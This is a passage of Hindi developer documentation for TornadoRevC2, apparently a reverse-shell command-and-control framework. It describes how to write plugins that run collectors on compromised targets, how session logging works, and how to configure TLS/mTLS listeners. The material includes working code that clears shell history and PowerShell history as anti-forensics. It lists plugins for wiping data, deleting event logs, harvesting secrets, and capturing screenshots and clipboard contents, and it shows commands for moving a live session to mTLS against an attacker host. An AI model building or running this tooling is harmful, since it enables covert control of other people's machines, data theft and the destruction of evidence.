pid = args[0].strip()
session.log_event(f"Plugin memorymap: started for PID {pid}")
session._handler._flush_shell(session._client_sock, timeout=1.0)
unix_cmd = _build_linux_command(pid) # builder accepts runtime args
win_ps = _build_windows_command(pid)
raw = _run_collector_marked(session, unix_cmd, win_ps, session.platform, 45.0)
if raw is None:
session.print("Plugin 'memorymap' failed — no response from target.", "red")
return 1
data = parse_collector_json(raw)
report = format_memorymap_report(data)
session.print(report, "cyan")
session.log_plugin_result("memorymap", report, ...)
return 0
**संग्रह-पश्चात प्रसंस्करण उदाहरण** (`historydel` से):```python
def run(session: SessionContext, args):
# ... run collector via _run_collector_marked ...
data = parse_collector_json(raw)
# Additional in-memory cleanup in the interactive shell
if session.is_unix:
session.run_shell("history -c 2>/dev/null; history -w 2>/dev/null; true", timeout=5.0)
elif session.is_windows:
session.run_marked("", "Clear-History -ErrorAction SilentlyContinue", timeout=5.0)
report = format_historydel_report(data)
session.print(report, "green" if data.get("cleared") else "yellow")
return 0
मार्क्ड एक्ज़ीक्यूशन तक सीधी पहुँच के लिए, पूरे कलेक्टर रैपर के बिना, plugins/shared/runner.py से _run_collector_marked और parse_collector_json का उपयोग करें।
Linux कलेक्टर Python सोर्स स्ट्रिंग्स हैं जो build_linux_collector_command() के माध्यम से टारगेट पर निष्पादित होते हैं।
संरचना:
r'''...''') लौटाने वाला _linux_collector_source() परिभाषित करें।result डिक्ट बनाता है।_emit(result) को कॉल करें — कभी भी मार्कर मैन्युअली प्रिंट न करें।_build_linux_command() → build_linux_collector_command(source) से रैप करें।linux/_helpers.py में रैपर स्वचालित रूप से:
try/except ब्लॉक के अंदर इंडेंट करता है_emit(obj) को परिभाषित करता है जो __T_PLUGIN_START__ + JSON + __T_PLUGIN_END__ लिखता है{"error": "...", "traceback": "..."} एमिट करता हैpython3 -c (या python2 फ़ॉलबैक) के माध्यम से एनकोड करता है/tmp स्टेजिंग पर केवल तब फ़ॉलबैक करता है जब एनकोडेड पेलोड ~4000 बाइट्स से अधिक हो जाता हैनेटिव कमांड्स को प्राथमिकता दें:```python def sh(cmd, timeout=5): try: out = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, timeout=timeout) return out.decode("utf-8", "ignore") except Exception: return ""
result = {"summary": {}, "ports": []} output = sh("ss -tulpn 2>/dev/null || netstat -tulpn 2>/dev/null", 10) for line in output.splitlines()[:60]: result["ports"].append(line.strip()) _emit(result)
**दिशानिर्देश:**
- हर बाहरी कमांड के लिए `subprocess.check_output(..., timeout=N)` का उपयोग करें।
- उत्सर्जन से पहले बड़ी सूचियों को छोटा करें (50–80 प्रविष्टियों तक सीमित रखें)।
- अनुपलब्ध टूल्स को सहजता से संभालें—त्रुटि उठाने के बजाय अनुभागों को खाली छोड़ दें।
- आउटपुट में मार्कर स्ट्रिंग्स एम्बेड करने से बचें; `history` प्लगइन इसी कारण से एकत्र किए गए टेक्स्ट से `__T_PLUGIN_*__` को साफ़ करता है।
- इनलाइन आकार सीमा के भीतर रहने और `/tmp` स्टेजिंग से बचने के लिए कलेक्टरों को संक्षिप्त रखें।
### Windows कलेक्टर
Windows कलेक्टर PowerShell स्क्रिप्ट स्ट्रिंग्स हैं जो `_build_windows_command()` से लौटाए जाते हैं।
**संरचना:**```python
from tornadorevc2.constants import PLUGIN_MARK_END, PLUGIN_MARK_START
def _build_windows_command():
return rf"""
$ErrorActionPreference='SilentlyContinue'
$start='{PLUGIN_MARK_START}'; $end='{PLUGIN_MARK_END}'
$result = [ordered]@{{
summary = @{{ count = 0 }}
items = @()
}}
try {{
Get-CimInstance Win32_Service -EA 0 | Select-Object -First 50 | ForEach-Object {{
$result.items += @{{ name = $_.Name; state = $_.State }}
}}
$result.summary.count = $result.items.Count
}} catch {{
$result.summary.error = $_.Exception.Message
}}
Write-Output ($start + (ConvertTo-Json $result -Depth 5 -Compress) + $end)
"""
दिशानिर्देश:
$ErrorActionPreference='SilentlyContinue' सेट करें।-EA 0 (ErrorAction SilentlyContinue) का उपयोग करें जो पुराने सिस्टम पर विफल हो सकते हैं।{{ और }}।[ordered]@{{...}} का उपयोग करें।Get-NetTCPConnection, Get-Process, netsh, wevtutil) को प्राथमिकता दें।try/catch में लपेटें ताकि एक विफलता पूरे collector को निरस्त न करे।win_client.py के माध्यम से in-process वितरित की जाती हैं।विकल्प: न्यूनतम entry points वाले Windows-only plugins के लिए, एकल build_command() फ़ंक्शन का उपयोग करें:```python
@plugin.command(name="services", platforms=["windows"], description="...") def run(session: SessionContext, args): return run_collector_plugin(session, "services", None, build_command, format_generic_report, timeout=35.0)
### JSON payload परंपराएँ
कलेक्टरों को एक JSON-सीरियलाइज़ेबल dict लौटाना चाहिए। रनर और फ़ॉर्मेटर सुसंगत key उपयोग की अपेक्षा करते हैं:
| Key | Type | Purpose |
|-----|------|---------|
| `summary` | `dict` | उच्च-स्तरीय गणनाएँ और आँकड़े; `format_generic_report()` द्वारा पहले रेंडर किया जाता है |
| `error` | `str` | **हार्ड विफलता** — रनर त्रुटि प्रिंट करता है और exit code 1 लौटाता है |
| `traceback` | `str` | वैकल्पिक; जब `error` सेट हो तो विवरण के रूप में लॉग किया जाता है |
| `reason` | `str` | **सॉफ्ट विफलता** — कस्टम फ़ॉर्मेटरों के साथ उपयोग करें (जैसे clipboard अनुपलब्ध) |
| `ok` | `bool` | ऑपरेशनल प्लगइन्स (screenshot, clipboard) के लिए सफलता फ़्लैग |
| `dict` की सूचियाँ | `list` | `format_generic_report()` द्वारा तालिकाओं के रूप में रेंडर की जाती हैं |
| `str` की सूचियाँ | `list` | बुलेट सूचियों के रूप में रेंडर की जाती हैं |
| नेस्टेड `dict` | `dict` | लेबल किए गए अनुभागों के रूप में रेंडर किया जाता है |
**सौम्य अपकर्षण:** बहु-अनुभाग गणना के लिए, प्रत्येक अनुभाग के लिए अलग dict keys का उपयोग करें और अपवादों को स्थानीय रूप से पकड़ें। शीर्ष-स्तरीय `error` तब तक सेट न करें जब तक कि पूरा कलेक्टर विफल न हो जाए—आंशिक परिणाम बेहतर होते हैं।```python
result = {"summary": {}, "ufw": {}, "iptables": {}}
# Each backend probed independently; failures leave that section empty
format_generic_report के बजाय run_collector_plugin को एक कस्टम फ़ॉर्मेटर पास करें:```python
from tornadorevc2.plugins.shared.common import format_section, format_list_section
def format_firewall_report(data: dict) -> str: sections = [] summary = data.get("summary") or {} if summary: sections.append(format_section("Summary", summary)) for key in ("ufw", "iptables", "windows_defender_firewall"): block = data.get(key) if isinstance(block, dict) and block: sections.append(format_section(key.replace("_", " ").title(), block)) if not sections: return "Firewall: no data collected." return "\n\n".join(sections)
`plugins/shared/common.py` में पुनः प्रयोग योग्य हेल्पर:
| फ़ंक्शन | उद्देश्य |
|----------|---------|
| `format_generic_report(data, title='Results')` | डिफ़ॉल्ट टेबल/सेक्शन रेंडरर |
| `format_section(title, fields, width=22)` | की-वैल्यू सेक्शन |
| `format_list_section(title, items, empty='(none)')` | बुलेटेड सूची |
| `format_table_section(title, rows, columns)` | डिक्ट पंक्तियाँ कॉलम के रूप में |
| `format_firewall_report`, `format_memorymap_report`, आदि | प्लगइन-विशिष्ट फ़ॉर्मेटर |
### प्लेटफ़ॉर्म-विशिष्ट प्लगइन
**केवल Windows:**```python
@plugin.command(name="rdp", platforms=["windows"], description="...")
def run(session: SessionContext, args):
return run_collector_plugin(
session, "rdp",
None, # no Linux builder
build_command,
format_generic_report,
timeout=35.0,
)
केवल Linux:```python @plugin.command(name="cron", platforms=["linux", "unix"], description="...") def run(session: SessionContext, args): return run_collector_plugin( session, "cron", build_linux_command, None, # no Windows builder format_generic_report, timeout=30.0, )
**स्प्लिट बिल्डर्स के साथ क्रॉस-प्लेटफ़ॉर्म:**
कुछ साझा प्लगइन्स प्लेटफ़ॉर्म-विशिष्ट बिल्डर मॉड्यूल्स को डेलिगेट करते हैं (जैसे `virtualization` `linux/virtualization.py` और `windows/virtualization.py` से इम्पोर्ट करता है)। `@plugin.command` एंट्री पॉइंट `shared/` में ही रहता है; `linux/` या `windows/` के अंतर्गत बिल्डर मॉड्यूल्स में कोई डेकोरेटर नहीं होता और वे स्वतंत्र प्लगइन्स के रूप में रजिस्टर नहीं होते।
### बाहरी प्लगइन्स
बाहरी प्लगइन्स आपको रिपॉज़िटरी को संशोधित किए बिना TornadoRevC2 का विस्तार करने देते हैं।
**सेटअप:**```bash
# Default location (created automatically if missing)
./plugins/myplugin.py
# Or set a custom directory
export TORNADOREVC2_PLUGIN_DIR=/path/to/my/plugins
कार्यप्रवाह:```bash
plugins load myplugin # import and register commands plugins info myplugin # verify name, platforms, description, module path run myplugin 1 # execute against session 1 run myplugin 1 --verbose # extra args passed to handler as args=["--verbose"] plugins reload myplugin # re-import after editing (clears stale registrations) plugins unload myplugin # fully unload external plugin
**बाहरी बनाम अंतर्निहित लाइफसाइकिल:**
| क्रिया | अंतर्निहित प्लगइन | बाहरी प्लगइन |
|--------|-----------------|-----------------|
| `plugins unload` | सॉफ्ट-डिसेबल (मॉड्यूल इम्पोर्टेड रहता है) | पूरी तरह अनलोड और अनरजिस्टर्ड |
| `plugins reload` | मॉड्यूल को पुनः इम्पोर्ट करता है, पुरानी कमांड रजिस्ट्रेशन साफ़ करता है | `sys.modules` से हटाता है, डिस्क से पुनः इम्पोर्ट करता है |
| स्टार्टअप | ऑटो-लोडेड | मांग पर लोडेड |
नेमस्पेस टकराव से बचने के लिए बाहरी मॉड्यूल `tornado_ext_plugin_<name>` के रूप में इम्पोर्ट किए जाते हैं।
### SessionContext API
प्रत्येक हैंडलर को एक `SessionContext` प्राप्त होता है जो हैंडलर और क्लाइंट सॉकेट को रैप करता है:
**मेटाडेटा प्रॉपर्टीज़:**
| प्रॉपर्टी | प्रकार | विवरण |
|----------|------|-------------|
| `session_id` | `str` | असाइन किया गया सत्र पहचानकर्ता |
| `platform` | `str` | `unix`, `windows`, या `unknown` |
| `is_windows` / `is_unix` | `bool` | प्लेटफ़ॉर्म सुविधा फ़्लैग |
| `sysinfo` | `dict` | `sysinfo` संग्रह से कैश्ड होस्ट जानकारी |
| `identity` | `dict` | सत्र पहचान/फ़िंगरप्रिंट मेटाडेटा |
| `addr` | `tuple` | रिमोट पता |
| `tls` | `bool` | क्या सत्र TLS का उपयोग करता है |
| `name` | `str` | ऑपरेटर द्वारा असाइन किया गया फ्रेंडली नाम |
| `fingerprint` | `str` | स्थिर होस्ट फ़िंगरप्रिंट |
| `logger` | `SessionLogger` | प्रति-सत्र लॉग राइटर (`None` हो सकता है) |
| `colors` | `dict` | कंसोल रंग कोड |
| `socket` | socket | रॉ क्लाइंट सॉकेट (उन्नत उपयोग) |
**निष्पादन विधियाँ:**
| विधि | विवरण |
|--------|-------------|
| `run_shell(cmd, timeout=15.0)` | कमांड भेजें, आउटपुट की प्रतीक्षा करें, स्ट्रिंग लौटाएँ |
| `run_shell_streaming(cmd, timeout, idle_timeout, on_chunk)` | आइडल डिटेक्शन के साथ आउटपुट स्ट्रीम करें; लंबे समय तक चलने वाले कमांड के लिए उपयोगी |
| `run_marked(unix_cmd, win_ps_script, timeout, start_mark, end_mark, strip_ws)` | प्लेटफ़ॉर्म-उपयुक्त कमांड निष्पादित करें और चिह्नित पेलोड निकालें |
| `get_cwd()` | रिमोट वर्किंग डायरेक्टरी लौटाएँ |
| `collect_sysinfo(mode='stealth')` | होस्ट जानकारी संग्रह ट्रिगर करें |
**स्थानांतरण विधियाँ:**
| विधि | विवरण |
|--------|-------------|
| `upload(local_path, remote_path, resume=False)` | लक्ष्य पर फ़ाइल अपलोड करें |
| `download(remote_path, local_path, resume=False)` | लक्ष्य से फ़ाइल डाउनलोड करें |
| `verify_remote(remote_path)` | रिमोट फ़ाइल आकार और SHA-256 सत्यापित करें |
**लॉगिंग और आउटपुट:**
| विधि | विवरण |
|--------|-------------|
| `print(text, color=None)` | वैकल्पिक रंग (`red`, `green`, `yellow`, `cyan`) के साथ ऑपरेटर कंसोल पर प्रिंट करें |
| `log_event(message)` | `session.log` में टाइमस्टैम्प्ड इवेंट जोड़ें |
| `log_command(cmd, output)` | कमांड और आउटपुट को `session.log` में लॉग करें |
| `log_plugin_result(name, report, detail='')` | रिपोर्ट को `logs/<session>/plugins/<name>_<timestamp>.log` में लिखें |
### त्रुटि प्रबंधन और रिटर्न कोड
| रिटर्न | अर्थ | हैंडलर व्यवहार |
|--------|---------|------------------|
| `0` | सफलता | कोई चेतावनी प्रदर्शित नहीं |
| `1` (या कोई भी गैर-शून्य) | विफलता | पीली चेतावनी: `Plugin 'name' returned code N` |
| अनकैच्ड एक्सेप्शन | त्रुटि | लाल त्रुटि संदेश; सत्र लॉग में लॉग किया गया |
**कलेक्टर विफलता मोड** (`run_collector_plugin` द्वारा संभाला गया):
| स्थिति | व्यवहार |
|-----------|----------|
| टाइमआउट / आउटपुट में कोई मार्कर नहीं | एग्ज़िट 1, "no response" लॉग करें |
| आउटपुट मान्य JSON नहीं | एग्ज़िट 1, रॉ आउटपुट (ट्रंकेटेड) को विवरण के रूप में लॉग करें |
| `data["error"]` मौजूद | एग्ज़िट 1, त्रुटि और ट्रेसबैक प्रिंट करें |
| आंशिक सेक्शन विफलताएँ | टॉप-लेवल `error` सेट **नहीं** करना चाहिए; सेक्शन खाली छोड़ें |
**सॉफ्ट विफलताएँ** (ऑपरेशनल प्लगइन): `reason` या `ok: false` का उपयोग करें और रनर के हार्ड `error` चेक पर निर्भर रहने के बजाय कस्टम फ़ॉर्मेटर या कस्टम हैंडलर में संभालें।
### सर्वोत्तम प्रथाएँ
1. **अपलोड किए गए टूलिंग की तुलना में नेटिव OS कमांड को प्राथमिकता दें**—यह फ्रेमवर्क के डिपेंडेंसी-लाइट डिज़ाइन के अनुरूप है।
2. **एन्यूमरेशन के लिए लक्ष्य पर फ़ाइलें न लिखें**; शेल चैनल पर डेटा लौटाएँ। ऑपरेशनल प्लगइन (wiper, historydel) स्पष्ट उद्देश्य वाले अपवाद हैं।
3. **शालीनता से डिग्रेड करें** — प्रत्येक बैकएंड को स्वतंत्र रूप से प्रोब करें; खाली सेक्शन कुल विफलता से बेहतर हैं।
4. **आउटपुट आकार सीमित करें** — सूचियों को 50–80 आइटम तक ट्रिम करें; लंबे स्ट्रिंग्स को 200–500 वर्णों तक ट्रंकेट करें।
5. **वास्तविक टाइमआउट सेट करें** — त्वरित प्रोब: 15–30s; व्यापक एन्यूमरेशन: 45–75s।
6. **लगातार लॉग करें** — शुरुआत में `session.log_event()` कॉल करें, पूर्ण होने पर `session.log_plugin_result()`, ट्रांसक्रिप्ट एक्सपोर्ट के लिए `session.log_command()`।
7. **args को जल्दी मान्य करें** — लक्ष्य पर कुछ भी भेजने से पहले उपयोग संदेश के साथ 1 लौटाएँ।
8. **दोनों कंसोल से परीक्षण करें** — मुख्य हैंडलर (`run plugin <ID>`) और अटैच्ड सत्र (`switch` फिर `run plugin`)।
9. **विकास के दौरान `plugins reload` का उपयोग करें** हैंडलर को पुनः आरंभ किए बिना परिवर्तनों को उठाने के लिए।
10. **संवेदनशील मार्कर साफ़ करें** एकत्रित आउटपुट से यदि आपका प्लगइन मनमाना फ़ाइल सामग्री पढ़ता है।
### संदर्भ कार्यान्वयन
| प्लगइन | फ़ाइल | पैटर्न | नोट्स |
|--------|------|---------|-------|
| `firewall` | `plugins/shared/firewall.py` | क्रॉस-प्लेटफ़ॉर्म कलेक्टर | मल्टी-बैकएंड शालीन डिग्रेडेशन |
| `ports` | `plugins/shared/ports.py` | क्रॉस-प्लेटफ़ॉर्म कलेक्टर | नेटिव `ss` / `Get-NetTCPConnection` |
| `history` | `plugins/shared/history.py` | क्रॉस-प्लेटफ़ॉर्म कलेक्टर | Linux Python + Windows PowerShell बिल्डर |
| `memorymap` | `plugins/shared/memorymap.py` | कस्टम हैंडलर | PID आर्गुमेंट, डायनामिक बिल्डर |
| `screenshot` | `plugins/shared/screenshot.py` | कस्टम हैंडलर | JSON में Base64; ऑपरेटर-साइड PNG सेव |
| `clipboard` | `plugins/shared/clipboard.py` | कस्टम हैंडलर | `reason` फ़ील्ड के माध्यम से सॉफ्ट विफलता |
| `historydel` | `plugins/shared/historydel.py` | कस्टम हैंडलर | विनाशकारी; पोस्ट-कलेक्टर शेल क्लीनअप |
| `wiper` | `plugins/shared/wiper.py` | कस्टम हैंडलर | विनाशकारी; पथ आर्गुमेंट सत्यापन |
| `services` | `plugins/windows/services.py` | Windows-केवल कलेक्टर | न्यूनतम एंट्री पॉइंट |
| `eventlogdel` | `plugins/windows/eventlogdel.py` | Windows-केवल कलेक्टर | विनाशकारी; प्रति-लॉग विफलता रिपोर्टिंग |
| `rdp` | `plugins/windows/rdp.py` | Windows-केवल कलेक्टर | रजिस्ट्री और फ़ायरवॉल एन्यूमरेशन |
| `virtualization` | `plugins/shared/virtualization.py` | साझा एंट्री + स्प्लिट बिल्डर | `linux/` और `windows/` बिल्डर इम्पोर्ट करता है |
| `secrets` | `plugins/linux/secrets.py` | Linux-केवल कलेक्टर | प्लेटफ़ॉर्म-प्रतिबंधित लिस्टिंग |
नए एन्यूमरेशन प्लगइन के लिए, `plugins/shared/runner.py` में `run_collector_plugin` से शुरू करें और `firewall.py` या `ports.py` से लेआउट कॉपी करें। आर्गुमेंट या साइड इफेक्ट वाले प्लगइन के लिए, `memorymap.py` या `wiper.py` देखें।
---
## सत्र लॉगिंग
प्रत्येक सत्र `logs/` के अंतर्गत एक पृथक डायरेक्टरी में लिखता है:```text
logs/001_user@hostname_192.168.1.10_unix_10-08-2026_143022/
session.log Operator commands and console output
sysinfo.json Host information snapshot
transfers/ Upload and download event logs
executions/ In-memory payload execution metadata
plugins/ Plugin reports and collector output
quickenum_20260812_054812.log
firewall_20260812_055130.log
screenshot_20260812_055412.png
Plugin लॉग में एक मानव-पठनीय रिपोर्ट होती है और, जब लागू हो, रिमोट कलेक्टर द्वारा लौटाया गया कच्चा JSON पेलोड भी।
TornadoRevC2/ ├── tornadorevc2.py Entry point ├── tornadorevc2/ │ ├── handler.py Listeners, sessions, operator console │ ├── updater.py Git-based self-update and restart │ ├── sysinfo.py Host information collection │ ├── terminal.py PTY/TTY management │ ├── transfer.py Chunked file transfers │ ├── tunnel.py SOCKS5 pivoting │ ├── remote_exec.py Remote command builders │ ├── win_client.py Windows shell detection and script delivery │ ├── session_registry.py Session persistence and reconnect logic │ ├── session_log.py Per-session directory logging │ ├── export.py HTML transcript export │ ├── payloads.py Built-in payload catalog │ └── plugins/ │ ├── api.py SessionContext and plugin registration │ ├── manager.py Plugin lifecycle and execution │ ├── loader.py Module discovery │ ├── shared/ Cross-platform plugins │ ├── linux/ Linux/Unix-only plugins │ └── windows/ Windows-only plugins ├── plugins/ Optional external plugin directory └── logs/ Session output (created at runtime)
---
## TLS और mTLS कॉन्फ़िगरेशन
TornadoRevC2 तीन अलग-अलग लिसनर चलाता है, प्रत्येक का अपना प्रमाणपत्र स्रोत होता है। `tls_certs/` और `mtls_certs/` के अंतर्गत सब कुछ पहली बार चलाने पर स्वतः-उत्पन्न होता है और कभी अधिलेखित नहीं होता।
| लिसनर | पोर्ट | क्लाइंट प्रमाणीकरण | प्रमाणपत्र |
|----------|------|-------------|--------------|
| TCP | `4444` | कोई नहीं | — |
| TLS | `8443` | केवल-सर्वर | `tls_certs/server.pem`, `tls_certs/server.key` |
| mTLS | `9443` | पारस्परिक (क्लाइंट प्रमाणपत्र आवश्यक) | `mtls_certs/` बंडल |
### TLS
स्वतः-हस्ताक्षरित जोड़ी (`CN=localhost`, RSA-2048, 3650 दिन) के रूप में स्वतः-उत्पन्न।
अपना स्वयं का प्रदान करने के लिए:```bash
python tornadorevc2.py -H 0.0.0.0 -p 4444 -tp 8443 \
-c tls_certs/server.pem -k tls_certs/server.key
यदि क्लाइंट किसी IP पते का उपयोग करके कनेक्ट करता है, तो सर्वर प्रमाणपत्र में उस IP को उसके Subject Alternative Name (SAN) में शामिल करना चाहिए। होस्टनेम सत्यापन को अक्षम करने से बचें जब तक कि ऐसा करने का कोई विशिष्ट कारण न हो।
पहली बार चलाने पर, mtls_certs/ के अंतर्गत एक पूर्ण PKI बूटस्ट्रैप किया जाता है:
ca.pem / ca.key — स्व-हस्ताक्षरित CA (RSA-4096, CN=TornadoRevC2-mTLS-CA)server-mtls.pem / server-mtls.key — CA द्वारा हस्ताक्षरित सर्वर प्रमाणपत्रclient.pem / client.key — CA द्वारा हस्ताक्षरित क्लाइंट प्रमाणपत्रca.srl — प्रमाणपत्र हस्ताक्षर के दौरान उत्पन्न OpenSSL सीरियल काउंटरअधिकृत क्लाइंट के साथ client.pem + client.key + ca.pem भेजें। क्लाइंट को कनेक्ट करते समय अपना प्रमाणपत्र प्रस्तुत करना होगा अन्यथा हैंडशेक अस्वीकार कर दिया जाता है।
स्पष्ट पथों के साथ प्रारंभ करें:```bash
python tornadorevc2.py -H 0.0.0.0 -mp 9443
--mtls-ca-cert mtls_certs/ca.pem --mtls-ca-key mtls_certs/ca.key
--mtls-server-cert mtls_certs/server-mtls.pem --mtls-server-key mtls_certs/server-mtls.key
--mtls-client-cert mtls_certs/client.pem --mtls-client-key mtls_certs/client.key
### लाइव सेशन को mTLS में अपग्रेड करना
सादे TCP या server-auth TLS पर मौजूद सेशन को हैंडलर को रीस्टार्ट किए बिना mTLS लिसनर पर ले जाया जा सकता है। `upgrade_mtls` प्लगइन `client.pem`, `client.key`, और `ca.pem` को टारगेट पर अपलोड करता है, एक बैकग्राउंड शेल लॉन्च करता है जो क्लाइंट सर्टिफिकेट प्रस्तुत करता है, और (डिफ़ॉल्ट रूप से) नया सेशन शुरू होने के बाद बंडल को डिस्क से हटा देता है।```bash
# From the main handler prompt
run upgrade_mtls 1 --port 9443 --host 10.10.14.7
run upgrade_mtls 1 --keep-bundle # leave certs on disk after launch
run upgrade_mtls 1 --no-upload # certificate bundle already uploaded manually
# From inside an attached session (switch 1)
run upgrade_mtls
| फ़्लैग | डिफ़ॉल्ट |
|---|---|
-H / --host | 0.0.0.0 |
-p / --port | 4444 |
-tp / --tls-port | 8443 |
-mp / --mtls-port | 9443 |
-c / --cert, -k / --key | tls_certs/server.{pem,key} |
--mtls-ca-cert / --mtls-ca-key | mtls_certs/ca.{pem,key} |
--mtls-server-cert / --mtls-server-key | mtls_certs/server-mtls.{pem,key} |
--mtls-client-cert / --mtls-client-key | mtls_certs/client.{pem,key} |
यह प्रोजेक्ट GNU General Public License v3.0 के अंतर्गत लाइसेंस प्राप्त है।